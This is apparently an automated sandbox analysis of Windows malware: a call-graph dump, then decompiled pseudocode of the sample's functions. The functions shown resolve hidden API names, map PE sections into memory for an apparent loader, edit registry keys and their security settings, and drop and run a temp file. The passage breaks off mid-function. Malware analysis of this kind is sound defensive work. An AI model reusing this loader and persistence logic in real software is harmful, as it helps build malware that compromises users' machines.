14626->14627 14627->14598 14628 3c9090 2 API calls 14627->14628 14629 3c6472 VariantInit VariantInit VariantInit 14628->14629 14630 3c13c0 2 API calls 14629->14630 14631 3c64db 14630->14631 14632 3c13c0 2 API calls 14631->14632 14633 3c64fe 14632->14633 14634 3c7cf0 4 API calls 14633->14634 14635 3c6583 14634->14635 14636 3c7cf0 4 API calls 14635->14636 14637 3c658b VariantClear VariantClear VariantClear 14636->14637 14637->14598 14639 3c9090 2 API calls 14638->14639 14640 3e07be 14639->14640 14653 3e0640 14640->14653 14643 3c9090 2 API calls 14644 3e07e7 StrStrW 14643->14644 14663 3cf630 14644->14663 14646 3e0806 14647 3e0640 12 API calls 14646->14647 14648 3e080d memset 14647->14648 14649 3c9090 2 API calls 14648->14649 14650 
3e0829 14649->14650 14651 3e0640 12 API calls 14650->14651 14652 3ce7e0 14651->14652 14652->14572 14654 3e065c StrChrW RegOpenKeyExW 14653->14654 14655 3e0657 14653->14655 14656 3e0692 GetSecurityInfo 14654->14656 14662 3e073a memset 14654->14662 14655->14654 14657 3e06b9 14656->14657 14656->14662 14678 3c80a0 14657->14678 14660 3e0718 SetNamedSecurityInfoW 14660->14662 14661 3e06f7 RegSetValueExW 14661->14660 14662->14643 14664 3cf63e 14663->14664 14665 3cf63a 14663->14665 14666 3d1d90 10 API calls 14664->14666 14665->14646 14667 3cf65a memset memcpy 14666->14667 14671 3cf68a 14667->14671 14668 3cf6fc 14670 3cbb40 HeapFree 14668->14670 14672 3cf707 14670->14672 14671->14668 14674 3cf6e2 14671->14674 14696 3ccea0 14671->14696 14704 3c97e0 14671->14704 14672->14646 14675 3ccea0 4 API calls 14674->14675 14676 3cf6ec 14675->14676 14676->14668 14677 3c97e0 5 API calls 14676->14677 14677->14668 14679 3c80e9 14678->14679 14680 3c8121 memset 14679->14680 14683 3c824a StrChrW RegOpenKeyExW 14679->14683 14681 3c817e 14680->14681 14682 3c8188 SetSecurityInfo 14681->14682 14681->14683 14682->14683 14684 3c81b1 14682->14684 14683->14660 14683->14661 14684->14683 14692 3e1ff0 14684->14692 14687 3c81f4 SetSecurityInfo 14687->14683 14688 3c8216 14687->14688 14689 3e1ff0 AdjustTokenPrivileges 14688->14689 14690 3c8226 14689->14690 14690->14683 14691 3c822d SetSecurityInfo 14690->14691 14691->14683 14693 3e200e 14692->14693 14694 3e2019 AdjustTokenPrivileges 14693->14694 14695 3c81ed 14693->14695 14694->14695 14695->14683 14695->14687 14697 3cceab 14696->14697 14698 3cceb0 14696->14698 14697->14671 14699 3ccebc lstrlenW 14698->14699 14700 3ccf41 14698->14700 14699->14700 14701 3ccec7 RegOpenKeyExW RegOpenKeyExW 14699->14701 14700->14671 14702 3ccf22 14701->14702 14703 3ccf03 RegOpenKeyExW 14701->14703 14702->14671 14703->14702 14705 3ccea0 4 API calls 14704->14705 14706 3c97fa 14705->14706 14707 3c9809 RegCreateKeyExW 14706->14707 14708 3c9801 14706->14708 14707->14708 14708->14671 
14719 3c32e5 14709->14719 14710 3c334c VariantClear 14710->14719 14711 3c3378 SysFreeString 14711->14719 14712 3c32e9 14712->14604 14712->14605 14713 3c348f VariantClear 14714 3c3412 14713->14714 14714->14712 14714->14713 14717 3c34b7 SysFreeString 14714->14717 14715 3c33f2 SysFreeString 14715->14719 14716 3c9090 2 API calls 14716->14719 14718 3c32c0 2 API calls 14717->14718 14718->14714 14719->14710 14719->14711 14719->14712 14719->14714 14719->14715 14719->14716 14727 3c5c07 14720->14727 14721 3c5c42 LookupAccountSidW 14723 3c5cd5 14721->14723 14724 3c5c61 14721->14724 14722 3c5eff 14722->14608 14726 3c5d37 14723->14726 14728 3d1d90 10 API calls 14723->14728 14724->14608 14725 3cbb40 HeapFree 14725->14722 14790 3c1c70 14726->14790 14727->14721 14762 3c5eed 14727->14762 14730 3c5cf0 memcpy memcpy 14728->14730 14730->14726 14731 3c5d47 14732 3d1d90 10 API calls 14731->14732 14733 3c5d58 14732->14733 14734 3c9090 2 API calls 14733->14734 14735 3c5d65 14734->14735 14736 3c9090 2 API calls 14735->14736 14737 3c5d73 14736->14737 14738 3c5dac 14737->14738 14740 3c9090 2 API calls 14737->14740 14739 3c9090 2 API calls 14738->14739 14741 3c5db7 14739->14741 14742 3c5d83 14740->14742 14743 3c9090 2 API calls 14741->14743 14744 3c9090 2 API calls 14742->14744 14745 3c5dc5 _time64 _localtime64 14743->14745 14744->14738 14746 3c9090 2 API calls 14745->14746 14747 3c5df7 wcsftime 14746->14747 14748 3c5e20 14747->14748 14749 3c9090 2 API calls 14748->14749 14750 3c5e3c 14749->14750 14751 3c9090 2 API calls 14750->14751 14758 3c5e99 14750->14758 14754 3c5e6f 14751->14754 14752 3c9090 2 API calls 14753 3c5ea7 14752->14753 14755 3c8030 10 API calls 14753->14755 14756 3c9090 2 API calls 14754->14756 14757 3c5eb3 14755->14757 14756->14758 14759 3c9090 2 API calls 14757->14759 14758->14752 14760 3c5eda 14759->14760 14761 3cbb40 HeapFree 14760->14761 14761->14762 14762->14722 14762->14725 14764 3e02b0 14763->14764 14764->14614 14766 3c13d7 SysAllocString 14765->14766 14767 3c13f6 
14765->14767 14766->14767 14767->14616 14769 3c6417 14768->14769 14770 3c7cfa InterlockedDecrement 14768->14770 14769->14621 14770->14769 14771 3c7d08 14770->14771 14771->14769 14772 3c7d19 14771->14772 14773 3c7d12 SysFreeString 14771->14773 14774 3c7d29 ??3@YAXPAX 14772->14774 14775 3c7d20 ??_V@YAXPAX 14772->14775 14773->14772 14774->14769 14775->14774 14777 3c6d68 14776->14777 14778 3c6d93 14777->14778 14779 3c6d71 GetTokenInformation 14777->14779 14778->14598 14779->14778 14781 3e05a7 14780->14781 14795 3e0320 RegOpenKeyW 14781->14795 14783 3e0634 14783->14598 14784 3e05c1 14784->14783 14798 3e04a0 memset GetTempPathA 14784->14798 14786 3e05f1 GetModuleFileNameW 14804 3e0380 RegCreateKeyExW RegSetValueExW RegCloseKey 14786->14804 14788 3e0624 14789 3e04a0 11 API calls 14788->14789 14789->14783 14791 3d12a0 2 API calls 14790->14791 14792 3c1c8a 14791->14792 14793 3d1d90 10 API calls 14792->14793 14794 3c1c96 14793->14794 14794->14731 14796 3e0369 14795->14796 14797 3e0341 RegQueryValueExW RegCloseKey 14795->14797 14796->14784 14797->14796 14799 3e04f0 14798->14799 14805 3e03d0 CreateFileA WriteFile CloseHandle 14799->14805 14801 3e0531 14806 3e0420 memset CreateProcessA 14801->14806 14804->14788 14805->14801 14807 3e0499 DeleteFileA 14806->14807 14808 3e0474 WaitForSingleObject CloseHandle CloseHandle 14806->14808 14807->14786 14808->14807 14821 3e2403 GetEnvironmentStringsW 15516 401000 15517 401006 15516->15517 15517->15517 15520 401072 15517->15520 15521 40107b 15520->15521 15528 438032 15521->15528 15541 437b9e 15521->15541 15578 438218 15521->15578 15587 43823b 15521->15587 15596 437b96 15521->15596 15522 40100e 15531 438039 15528->15531 15530 438143 15532 43814a 15530->15532 15533 43818b NtQueryInformationProcess 15530->15533 15535 4381aa 15530->15535 15633 401127 15530->15633 15531->15530 15534 401127 34 API calls 15531->15534 15532->15522 15533->15530 15534->15530 15535->15532 15536 401127 34 API calls 15535->15536 15537 438201 15536->15537 15641 3e24b9 
15537->15641 15651 3e2480 15537->15651 15665 3cd616 15537->15665 15542 437c09 15541->15542 15543 401127 30 API calls 15541->15543 15544 437c54 GetCurrentProcess 15542->15544 15546 401127 30 API calls 15542->15546 15556 437c21 15542->15556 15543->15542 15545 401127 30 API calls 15544->15545 15547 437c6f 15545->15547 15548 437c3e 15546->15548 15549 401127 30 API calls 15547->15549 15547->15556 15548->15544 15548->15556 15550 437c98 15549->15550 15551 437d98 15550->15551 15555 401127 30 API calls 15550->15555 15550->15556 15552 437ed8 15551->15552 15553 401127 30 API calls 15551->15553 15554 401127 30 API calls 15552->15554 15561 437dbd 15553->15561 15570 437eeb 15554->15570 15555->15550 15556->15522 15557 401127 30 API calls 15559 437f63 LoadLibraryA 15557->15559 15558 401127 30 API calls 15560 438143 15558->15560 15559->15556 15559->15570 15560->15556 15560->15558 15565 43818b NtQueryInformationProcess 15560->15565 15567 4381aa 15560->15567 15561->15552 15564 401127 30 API calls 15561->15564 15562 43802c 15562->15560 15566 401127 30 API calls 15562->15566 15563 401127 30 API calls 15563->15570 15564->15561 15565->15560 15566->15560 15567->15556 15572 401127 30 API calls 15567->15572 15568 437fa7 15569 437fb3 GetProcAddress 15568->15569 15571 401127 30 API calls 15568->15571 15569->15570 15570->15556 15570->15557 15570->15562 15570->15563 15570->15568 15574 437fdb GetProcAddress 15571->15574 15573 438201 15572->15573 15575 3e24b9 4 API calls 15573->15575 15576 3cd616 13 API calls 15573->15576 15577 3e2480 7 API calls 15573->15577 15574->15570 15575->15556 15576->15556 15577->15556 15578->15578 15579 4381d7 15578->15579 15580 43822f 15579->15580 15581 401127 35 API calls 15579->15581 15582 438201 15581->15582 15584 3e24b9 4 API calls 15582->15584 15585 3cd616 13 API calls 15582->15585 15586 3e2480 7 API calls 15582->15586 15583 438207 15583->15522 15584->15583 15585->15583 15586->15583 15588 4381f7 15587->15588 15589 43824f 15587->15589 15590 401127 35 API calls 
15588->15590 15591 438201 15590->15591 15593 3e24b9 4 API calls 15591->15593 15594 3cd616 13 API calls 15591->15594 15595 3e2480 7 API calls 15591->15595 15592 438207 15592->15522 15593->15592 15594->15592 15595->15592 15597 401127 30 API calls 15596->15597 15598 437c09 15597->15598 15599 437c54 GetCurrentProcess 15598->15599 15601 401127 30 API calls 15598->15601 15617 437c21 15598->15617 15600 401127 30 API calls 15599->15600 15602 437c6f 15600->15602 15603 437c3e 15601->15603 15604 401127 30 API calls 15602->15604 15602->15617 15603->15599 15603->15617 15610 437c98 15604->15610 15605 437d98 15606 437ed8 15605->15606 15607 401127 30 API calls 15605->15607 15608 401127 30 API calls 15606->15608 15615 437dbd 15607->15615 15612 437eeb 15608->15612 15609 401127 30 API calls 15609->15610 15610->15605 15610->15609 15610->15617 15611 43802c 15621 401127 30 API calls 15611->15621 15623 438143 15611->15623 15612->15611 15613 401127 30 API calls 15612->15613 15612->15617 15618 401127 30 API calls 15612->15618 15624 437fa7 15612->15624 15616 437f63 LoadLibraryA 15613->15616 15614 401127 30 API calls 15614->15623 15615->15606 15619 401127 30 API calls 15615->15619 15616->15612 15616->15617 15617->15522 15618->15612 15619->15615 15620 43818b NtQueryInformationProcess 15620->15623 15621->15623 15622 4381aa 15622->15617 15627 401127 30 API calls 15622->15627 15623->15614 15623->15617 15623->15620 15623->15622 15625 437fb3 GetProcAddress 15624->15625 15626 401127 30 API calls 15624->15626 15625->15612 15629 437fdb GetProcAddress 15626->15629 15628 438201 15627->15628 15630 3e24b9 4 API calls 15628->15630 15631 3cd616 13 API calls 15628->15631 15632 3e2480 7 API calls 15628->15632 15629->15612 15630->15617 15631->15617 15632->15617 15634 401164 15633->15634 15636 438032 35 API calls 15634->15636 15637 437b96 35 API calls 15634->15637 15638 43823b 35 API calls 15634->15638 15639 438218 35 API calls 15634->15639 15640 437b9e 35 API calls 15634->15640 15635 4011ad 15635->15530 
15636->15635 15637->15635 15638->15635 15639->15635 15640->15635 15642 3e24cd __initterm_e 15641->15642 15643 3e24e7 _initterm 15642->15643 15644 3e2502 15642->15644 15646 3e24d3 15642->15646 15643->15644 15645 3e2507 InterlockedExchange 15644->15645 15647 3e250f 15644->15647 15645->15647 15646->15532 15647->15646 15648 3e25df 15647->15648 15649 3e2593 exit 15647->15649 15648->15646 15650 3e25e7 _cexit 15648->15650 15649->15647 15650->15646 15652 3e248c Sleep 15651->15652 15653 3e2484 15651->15653 15654 3e2473 InterlockedCompareExchange 15652->15654 15655 3e24af 15653->15655 15656 3e24a5 _amsg_exit 15653->15656 15654->15651 15654->15653 15657 3e24e7 _initterm 15655->15657 15658 3e2502 15655->15658 15656->15655 15657->15658 15659 3e2507 InterlockedExchange 15658->15659 15661 3e250f 15658->15661 15659->15661 15660 3e25ed 15660->15532 15661->15660 15662 3e25df 15661->15662 15663 3e2593 exit 15661->15663 15662->15660 15664 3e25e7 _cexit 15662->15664 15663->15661 15664->15660 15683 3c7131 15665->15683 15667 3cd61b 15668 3e2442 GetStartupInfoW 15667->15668 15669 3e2473 InterlockedCompareExchange 15668->15669 15670 3e2484 15669->15670 15671 3e2480 15669->15671 15673 3e24af 15670->15673 15674 3e24a5 _amsg_exit 15670->15674 15671->15670 15672 3e248c Sleep 15671->15672 15672->15669 15675 3e24e7 _initterm 15673->15675 15676 3e2502 15673->15676 15674->15673 15675->15676 15677 3e2507 InterlockedExchange 15676->15677 15679 3e250f 15676->15679 15677->15679 15678 3e25ed 15678->15532 15679->15678 15680 3e25df 15679->15680 15681 3e2593 exit 15679->15681 15680->15678 15682 3e25e7 _cexit 15680->15682 15681->15679 15682->15678 15684 3c7156 15683->15684 15685 3c7163 GetSystemTimeAsFileTime GetCurrentProcessId GetCurrentThreadId GetTickCount QueryPerformanceCounter 15683->15685 15684->15685 15686 3c715a 15684->15686 15687 3c71a2 15685->15687 15686->15667 15687->15686 15865 401026 15866 40107b 15865->15866 15868 438032 35 API calls 15866->15868 15869 437b96 35 API calls 15866->15869 15870 
43823b 35 API calls 15866->15870 15871 438218 35 API calls 15866->15871 15872 437b9e 35 API calls 15866->15872 15867 4011ad 15868->15867 15869->15867 15870->15867 15871->15867 15872->15867 14809 3c3dd0 ??2@YAPAXI 14810 3c3de5 memset 14809->14810 14812 3c3dfd 14809->14812 14810->14812 14813 3c3e20 14812->14813 14814 3cf250 14812->14814 14815 3c9090 2 API calls 14814->14815 14816 3cf26e LoadLibraryW 14815->14816 14817 3cf2be 14816->14817 14818 3cf292 14816->14818 14817->14812 14819 3c6cb0 2 API calls 14818->14819 14820 3cf29f GetProcAddress 14819->14820 14820->14817 14820->14818

    Executed Functions

    Control-flow Graph

    C-Code - Quality: 100%
    			E003CEB30() {
    				char _v104;
    				short _v304;
    				intOrPtr _t28;
    				void* _t29;
    				struct HINSTANCE__* _t30;
    				struct HINSTANCE__* _t31;
    				intOrPtr _t35;
    				struct HINSTANCE__* _t39;
    				struct HINSTANCE__* _t41;
    				_Unknown_base(*)()* _t44;
    				_Unknown_base(*)()* _t47;
    				_Unknown_base(*)()* _t50;
    				_Unknown_base(*)()* _t53;
    				_Unknown_base(*)()* _t56;
    				_Unknown_base(*)()* _t59;
    				_Unknown_base(*)()* _t62;
    				_Unknown_base(*)()* _t65;
    				_Unknown_base(*)()* _t68;
    				_Unknown_base(*)()* _t71;
    				intOrPtr _t86;
    				struct HINSTANCE__* _t89;
    				struct HINSTANCE__* _t90;
    				struct HINSTANCE__* _t91;
    				struct HINSTANCE__* _t92;
    				struct HINSTANCE__* _t93;
    				struct HINSTANCE__* _t94;
    				struct HINSTANCE__* _t95;
    				struct HINSTANCE__* _t96;
    				struct HINSTANCE__* _t97;
    				struct HINSTANCE__* _t98;
    				void* _t99;
    				void* _t103;
    
    				_t28 =  *0x3e8628; // 0x622508
    				 *0x3e85c0 = 0;
    				 *0x3e85bc = 0;
    				 *0x3e85c4 = 0;
    				_t29 =  *((intOrPtr*)( *((intOrPtr*)(_t28 + 0xf4))))(_t99, _t103);
    				_t122 = _t29 - 5;
    				if(_t29 <= 5) {
    					L14:
    					_t30 =  *0x3e85bc; // 0x0
    					__eflags = _t30;
    					if(_t30 != 0) {
    						_t35 =  *0x3e8628; // 0x622508
    						 *((intOrPtr*)( *((intOrPtr*)(_t35 + 0x1c))))(_t30);
    						 *0x3e85bc = 0;
    					}
    					goto L16;
    				} else {
    					E003C9090(_t122,  &_v304, 0x5b);
    					_t39 = LoadLibraryW( &_v304); // executed
    					 *0x3e85bc = _t39;
    					_t123 = _t39;
    					if(_t39 == 0) {
    						L16:
    						_t31 =  *0x3e85c4; // 0x0
    						__eflags = _t31;
    						if(_t31 != 0) {
    							_t86 =  *0x3e8628; // 0x622508
    							 *((intOrPtr*)( *((intOrPtr*)(_t86 + 0x1c))))(_t31);
    							 *0x3e85c4 = 0;
    						}
    						__eflags = 0;
    						return 0;
    					} else {
    						E003C9090(_t123,  &_v304, 0x5c);
    						_t41 = LoadLibraryW( &_v304);
    						 *0x3e85c4 = _t41;
    						if(_t41 == 0) {
    							goto L14;
    						} else {
    							E003C6CB0( &_v104, 0x5d);
    							_t89 =  *0x3e85bc; // 0x0
    							_t44 = GetProcAddress(_t89,  &_v104);
    							 *0x3e85d4 = _t44;
    							if(_t44 == 0) {
    								goto L14;
    							} else {
    								E003C6CB0( &_v104, 0x5e);
    								_t90 =  *0x3e85bc; // 0x0
    								_t47 = GetProcAddress(_t90,  &_v104);
    								 *0x3e85e8 = _t47;
    								if(_t47 == 0) {
    									goto L14;
    								} else {
    									E003C6CB0( &_v104, 0x5f);
    									_t91 =  *0x3e85bc; // 0x0
    									_t50 = GetProcAddress(_t91,  &_v104);
    									 *0x3e85cc = _t50;
    									if(_t50 == 0) {
    										goto L14;
    									} else {
    										E003C6CB0( &_v104, 0x60);
    										_t92 =  *0x3e85bc; // 0x0
    										_t53 = GetProcAddress(_t92,  &_v104);
    										 *0x3e85b8 = _t53;
    										if(_t53 == 0) {
    											goto L14;
    										} else {
    											E003C6CB0( &_v104, 0x61);
    											_t93 =  *0x3e85c4; // 0x0
    											_t56 = GetProcAddress(_t93,  &_v104);
    											 *0x3e85f4 = _t56;
    											if(_t56 == 0) {
    												goto L14;
    											} else {
    												E003C6CB0( &_v104, 0x62);
    												_t94 =  *0x3e85c4; // 0x0
    												_t59 = GetProcAddress(_t94,  &_v104);
    												 *0x3e85e0 = _t59;
    												if(_t59 == 0) {
    													goto L14;
    												} else {
    													E003C6CB0( &_v104, 0x63);
    													_t95 =  *0x3e85c4; // 0x0
    													_t62 = GetProcAddress(_t95,  &_v104);
    													 *0x3e85d0 = _t62;
    													if(_t62 == 0) {
    														goto L14;
    													} else {
    														E003C6CB0( &_v104, 0x64);
    														_t96 =  *0x3e85c4; // 0x0
    														_t65 = GetProcAddress(_t96,  &_v104);
    														 *0x3e85e4 = _t65;
    														if(_t65 == 0) {
    															goto L14;
    														} else {
    															E003C6CB0( &_v104, 0x65);
    															_t97 =  *0x3e85c4; // 0x0
    															_t68 = GetProcAddress(_t97,  &_v104);
    															 *0x3e85f0 = _t68;
    															if(_t68 == 0) {
    																goto L14;
    															} else {
    																E003C6CB0( &_v104, 0x66);
    																_t98 =  *0x3e85c4; // 0x0
    																_t71 = GetProcAddress(_t98,  &_v104);
    																 *0x3e85ec = _t71;
    																if(_t71 == 0) {
    																	goto L14;
    																} else {
    																	 *0x3e85c0 = 1;
    																	return 1;
    																}
    															}
    														}
    													}
    												}
    											}
    										}
    									}
    								}
    							}
    						}
    					}
    				}
    			}




































    APIs
    • LoadLibraryW.KERNEL32(?), ref: 003CEB82
    • LoadLibraryW.KERNEL32(?), ref: 003CEBA9
    • GetProcAddress.KERNEL32(00000000,?), ref: 003CEBD7
    • GetProcAddress.KERNEL32(00000000,?), ref: 003CEBFF
    • GetProcAddress.KERNEL32(00000000,?), ref: 003CEC27
    • GetProcAddress.KERNEL32(00000000,?), ref: 003CEC4F
    • GetProcAddress.KERNEL32(00000000,?), ref: 003CEC77
    • GetProcAddress.KERNEL32(00000000,?), ref: 003CEC9F
    • GetProcAddress.KERNEL32(00000000,?), ref: 003CECC7
    • GetProcAddress.KERNEL32(00000000,?), ref: 003CECEB
    • GetProcAddress.KERNEL32(00000000,?), ref: 003CED0F
    • GetProcAddress.KERNEL32(00000000,?), ref: 003CED33
    Memory Dump Source
    • Source File: 00000002.00000002.12939612937.003C1000.00000020.sdmp, Offset: 003C0000, based on PE: true
    • Associated: 00000002.00000002.12939589140.003C0000.00000002.sdmp
    • Associated: 00000002.00000002.12939651346.003E3000.00000002.sdmp
    • Associated: 00000002.00000002.12939666750.003E8000.00000004.sdmp
    • Associated: 00000002.00000002.12939674053.003E9000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_3c0000_ucE7u0vttK.jbxd

    Control-flow Graph

    C-Code - Quality: 100%
    			E003D1D90(long _a4, void* _a8) {
    				char _v104;
    				void* _t14;
    				void* _t15;
    				_Unknown_base(*)()* _t22;
    				_Unknown_base(*)()* _t24;
    				_Unknown_base(*)()* _t28;
    				_Unknown_base(*)()* _t31;
    				void* _t32;
    				struct HINSTANCE__* _t49;
    
    				_t14 =  *0x3e862c; // 0x160000
    				if(_t14 != 0) {
    					L7:
    					_t32 = _a8;
    					if(_t32 == 0) {
    						_t15 = RtlAllocateHeap(_t14, 8, _a4); // executed
    						return _t15;
    					} else {
    						return RtlReAllocateHeap(_t14, 8, _t32, _a4);
    					}
    				} else {
    					E003C6CB0( &_v104, 0x6c);
    					_t49 = LoadLibraryA( &_v104);
    					E003C6CB0( &_v104, 0x6d);
    					_t22 = GetProcAddress(_t49,  &_v104);
    					 *0x3e8630 = _t22;
    					if(_t22 != 0) {
    						E003C6CB0( &_v104, 0x6e);
    						_t24 = GetProcAddress(_t49,  &_v104);
    						 *0x3e863c = _t24;
    						if(_t24 == 0) {
    							goto L2;
    						} else {
    							E003C6CB0( &_v104, 0x6f);
    							_t28 = GetProcAddress(_t49,  &_v104);
    							 *0x3e8638 = _t28;
    							if(_t28 == 0) {
    								goto L2;
    							} else {
    								E003C6CB0( &_v104, 0x70);
    								_t31 = GetProcAddress(_t49,  &_v104);
    								 *0x3e8634 = _t31;
    								if(_t31 == 0) {
    									goto L2;
    								} else {
    									_t14 = GetProcessHeap();
    									 *0x3e862c = _t14;
    									goto L7;
    								}
    							}
    						}
    					} else {
    						L2:
    						return 0;
    					}
    				}
    			}

    APIs
    • LoadLibraryA.KERNEL32(?), ref: 003D1DB7
    • GetProcAddress.KERNEL32(00000000,?), ref: 003D1DD8
    • GetProcAddress.KERNEL32(00000000,?), ref: 003D1DFE
    • GetProcAddress.KERNEL32(00000000,?), ref: 003D1E1C
    • GetProcAddress.KERNEL32(00000000,?), ref: 003D1E3A
    • GetProcessHeap.KERNEL32 ref: 003D1E45
    • RtlReAllocateHeap.NTDLL(00160000,00000008,?,003D042E), ref: 003D1E5F
    • RtlAllocateHeap.NTDLL(00160000,00000008,003D042E), ref: 003D1E72
    Memory Dump Source
    • Source File: 00000002.00000002.12939612937.003C1000.00000020.sdmp, Offset: 003C0000, based on PE: true
    • Associated: 00000002.00000002.12939589140.003C0000.00000002.sdmp
    • Associated: 00000002.00000002.12939651346.003E3000.00000002.sdmp
    • Associated: 00000002.00000002.12939666750.003E8000.00000004.sdmp
    • Associated: 00000002.00000002.12939674053.003E9000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_3c0000_ucE7u0vttK.jbxd

    Control-flow Graph

    C-Code - Quality: 67%
    			E00437B9E(signed int __edx, void* __eflags, intOrPtr _a4) {
    				signed int _v8;
    				void* _v12;
    				signed int _v16;
    				signed int _v20;
    				signed int _v24;
    				signed int _v28;
    				signed int _v32;
    				signed int _v36;
    				signed int _v40;
    				signed int _v44;
    				signed int _v48;
    				signed int _v52;
    				signed int _v56;
    				signed int _v60;
    				signed int _v64;
    				signed int _v68;
    				signed int _v72;
    				signed int _v76;
    				signed int _v80;
    				signed int _v84;
    				signed int _v88;
    				signed int _v92;
    				signed short* _v96;
    				unsigned int _v100;
    				signed int _v104;
    				_Unknown_base(*)()* _v108;
    				signed int _v112;
    				signed int* _v116;
    				signed int _v120;
    				signed int _v124;
    				signed int _v128;
    				signed int _v132;
    				void* __esi;
    				void* __ebp;
    				intOrPtr _t328;
    				signed int _t331;
    				signed int _t334;
    				signed int _t344;
    				signed int _t346;
    				signed int _t376;
    				void* _t377;
    				CHAR* _t399;
    				struct HINSTANCE__* _t400;
    				signed int _t431;
    				signed int _t441;
    				signed char* _t455;
    				signed int* _t460;
    				signed int _t483;
    				signed int _t501;
    				void* _t524;
    				void* _t555;
    				void* _t557;
    				void* _t558;
    				void* _t559;
    				void* _t560;
    				void* _t562;
    
    				_t552 = __edx;
    				_v40 = _v40 & 0x00000000;
    				_v72 = _v72 & 0x00000000;
    				_v64 = _v64 & 0x00000000;
    				_v36 = _v36 & 0x00000000;
    				_v32 = _v32 & 0x00000000;
    				_v24 = _v24 & 0x00000000;
    				_v20 = _v20 & 0x00000000;
    				_v60 = _v60 & 0x00000000;
    				_v56 = _v56 & 0x00000000;
    				_v68 = _v68 & 0x00000000;
    				_v16 = _v16 & 0x00000000;
    				_v8 = _v8 & 0x00000000;
    				_v52 = _v52 & 0x00000000;
    				_v44 = _v44 & 0x00000000;
    				_v48 = _v48 & 0x00000000;
    				_v28 = _v28 & 0x00000000;
    				_t328 = _a4;
    				_t503 = _a4 +  *((intOrPtr*)(_t328 + 0x3c));
    				_v72 = _a4 +  *((intOrPtr*)(_t328 + 0x3c));
    				_push(0x40);
    				_push( *((intOrPtr*)(_v72 + 0x34)));
    				_push( *((intOrPtr*)(_v72 + 0x50)));
    				_push(0x1a);
    				_t331 = E00401127(_v72, _a4 +  *((intOrPtr*)(_t328 + 0x3c)), __edx, _t555, _t556);
    				_t558 = _t557 + 0xc;
    				_v24 = _t331;
    				if(_v24 != 0) {
    					L5:
    					_v12 = GetCurrentProcess();
    					_push(4);
    					_push(_v24);
    					_push( *((intOrPtr*)(_v72 + 0x54)));
    					_push(0x13);
    					_t334 = E00401127(_v72, _t503, _t552, _t555, _t556);
    					_t559 = _t558 + 0xc;
    					_v20 = _t334;
    					if(_v20 != 0) {
    						_push( *((intOrPtr*)(_v72 + 0x54)));
    						_push(_a4);
    						_push(_v20);
    						_push(0x18);
    						E00401127(_v72, _t503, _t552, _t555, _t556);
    						_t560 = _t559 + 0xc;
    						_v64 = ( *(_v72 + 0x14) & 0x0000ffff) + _v72 + 0x18;
    						_v76 = _v76 & 0x00000000;
    						while(_v76 < ( *(_v72 + 6) & 0x0000ffff)) {
    							_t552 = _v64;
    							_t556 = _v64;
    							if( *((intOrPtr*)(_v76 * 0x28 + _t552 + 8)) <=  *((intOrPtr*)(_v76 * 0x28 + _v64 + 0x10))) {
    								_v132 =  *((intOrPtr*)(_v76 * 0x28 + _v64 + 0x10));
    							} else {
    								_v132 =  *((intOrPtr*)(_v76 * 0x28 + _v64 + 8));
    							}
    							_v56 = _v132;
    							_t547 = _v64;
    							_v68 =  *((intOrPtr*)(_v76 * 0x28 + _v64 + 0xc));
    							_push(0x40);
    							_push(_v24 + _v68);
    							_push(_v56);
    							_push(0x13);
    							_t483 = E00401127(_v24 + _v68, _v64, _t552, _t555, _t556);
    							_t562 = _t560 + 0xc;
    							_v60 = _t483;
    							if(_v60 != 0) {
    								_push(_v56);
    								_push(0);
    								_push(_v60);
    								_push(0x17);
    								E00401127(_t483, _t547, _t552, _t555, _t556);
    								_t560 = _t562 + 0xc;
    								if( *((intOrPtr*)(_v76 * 0x28 + _v64 + 0x10)) > 0) {
    									_push( *((intOrPtr*)(_v76 * 0x28 + _v64 + 0x10)));
    									_t552 = _a4 +  *((intOrPtr*)(_v76 * 0x28 + _v64 + 0x14));
    									_push(_t552);
    									_push(_v60);
    									_push(0x18);
    									E00401127(_v76 * 0x28, _v64, _t552, _t555, _t556);
    									_t560 = _t560 + 0xc;
    								}
    								_v76 = _v76 + 1;
    								continue;
    							} else {
    								L82:
    								return _v40;
    							}
    						}
    						_t506 = _v24 -  *((intOrPtr*)(_v72 + 0x34));
    						_v16 = _t506;
    						if(_t506 == 0) {
    							L29:
    							_push( *((intOrPtr*)(_v72 + 0x80)));
    							_push(_a4);
    							_t344 = E00401127(_v72, _t506, _t552, _t555, _t556);
    							_t508 = 0xc;
    							_v32 = _t344;
    							if(_v32 == _a4) {
    								L49:
    								_v124 = _v124 & 0x00000000;
    								while(1) {
    									_t346 = _v72;
    									_t347 =  *(_t346 + 6) & 0x0000ffff;
    									if(_v124 >= ( *(_t346 + 6) & 0x0000ffff)) {
    										break;
    									}
    									if(( *(_v124 * 0x28 + _v64 + 0x24) & 0x20000000) == 0) {
    										if(( *(_v124 * 0x28 + _v64 + 0x24) & 0x40000000) == 0) {
    											if(( *(_v124 * 0x28 + _v64 + 0x24) & 0x80000000) == 0) {
    												_v128 = 1;
    											} else {
    												_v128 = 8;
    											}
    										} else {
    											if(( *(_v124 * 0x28 + _v64 + 0x24) & 0x80000000) == 0) {
    												_v128 = 2;
    											} else {
    												_v128 = 4;
    											}
    										}
    									} else {
    										if(( *(_v124 * 0x28 + _v64 + 0x24) & 0x40000000) == 0) {
    											if(( *(_v124 * 0x28 + _v64 + 0x24) & 0x80000000) == 0) {
    												_v128 = 0x10;
    											} else {
    												_v128 = 0x80;
    											}
    										} else {
    											if(( *(_v124 * 0x28 + _v64 + 0x24) & 0x80000000) == 0) {
    												_v128 = 0x20;
    											} else {
    												_v128 = 0x40;
    											}
    										}
    									}
    									_push(_v128);
    									_push( *((intOrPtr*)(_v124 * 0x28 + _v64 + 8)));
    									_t376 = _v124 * 0x28;
    									_t508 = _v64;
    									_t552 = _v24 +  *((intOrPtr*)(_t376 + _t508 + 0xc));
    									_push(_v24 +  *((intOrPtr*)(_t376 + _t508 + 0xc)));
    									_push(0x10);
    									_t377 = E00401127(_t376, _t508, _v24 +  *((intOrPtr*)(_t376 + _t508 + 0xc)), _t555, _t556);
    									_t560 = _t560 + 0xc;
    									if(_t377 != 0) {
    										_v124 = _v124 + 1;
    										continue;
    									} else {
    										goto L82;
    									}
    								}
    								_v8 = 0x18;
    								while(1) {
    									_push(_v52);
    									_push(_v8);
    									_t347 = E00401127(_t347, _t508, _t552, _t555, _t556);
    									_t508 = 0x15;
    									_v52 = _t347;
    									if(_v52 == 0) {
    										break;
    									}
    									if( *0x439a9d != 0) {
